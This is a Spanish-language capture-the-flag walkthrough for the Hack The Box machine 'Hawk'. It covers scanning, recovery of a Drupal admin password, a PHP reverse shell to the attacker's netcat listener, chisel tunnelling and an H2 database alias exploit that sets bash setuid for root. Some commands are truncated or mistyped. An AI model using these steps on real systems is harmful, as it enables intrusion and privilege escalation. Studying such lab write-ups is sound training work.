Hawk

Hawk


HTB Linux

mkdir hawk cd !$ mkt cd nmap nmap -p- —open -T5 -v -n 10.129.95.193

ssh_command.

nmap -p- -sS —min-rate 5000 —open -vvv -n -Pn 10.129.95.193 -oG allPorts

extractPorts allPorts

nmap -sCV -p80,21,22,5435,8082,9092 10.129.95.193 -oN targeted

whatweb http://10.129.95.193

ssh_command.

ftp 10.129.95.193

get .drupal.txt.enc

ssh_command.

cat .drupal.txt.enc

ssh_command.

cat .drupal.txt.enc | xargs | tr -d ” | base64 -d > drupal.txt

ssh_command.

./bruteforce.sh

ssh_command.

cat drupal.txt

Encontramos que la contrasena es PencilKeyboardScanner123

ssh_command.

Vamos a http://10.129.95.193:8082

ssh_command.

Metemos las credenciales admin:PencilKeyboardScanner123

ssh_command.

Ya en drupal vamos a modules y escogemos PHP filter.

ssh_command.

Escribimos el script de un reverse shell

&1|nc 10.10.14.108 443 >/tmp/f "); ?>

Y escogemos PHP code como formato de texto

ssh_command.

git clone https://github.com/jpillora/chisel

ssh_command.

go build -ldflags “-s -w” .

du -hc chisel

ssh_command.

python3 -m http.server 80

wget http://10.10.14.108/chisel

ssh_command.

chmod +x chisel

ssh_command.

En la maquina kali

./chisel server —reverse -p 1234

En la maquina atacada

./chisel client 10.10.14.108:1234 R:8082:127.0.0.1:8082

ssh_command.

Vamos a la pagina localhost:8082. Cambiamos el URL de test a otro nombre y le damos click a Preferences

ssh_command.

Escogemos la opcion de Allow connections from other computers

ssh_command.

Ya deberia de cambiar el url de test a otro nombre. Aqui puse uno. Le damos click a Connect

ssh_command.

ps -faux | grep -i h2-l

ssh_command.

Vemos el siguiente exploit: https://www.exploit-db.com/exploits/45506

CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(“\\A”); return s.hasNext() ? s.next() : ""; }$$ CALL EXECVE(‘chmod 4775 /bin/bashc’) Lo corremos y ya deberiamos de tener un root shell.

ssh_command.

© 2025 Cu3rv0x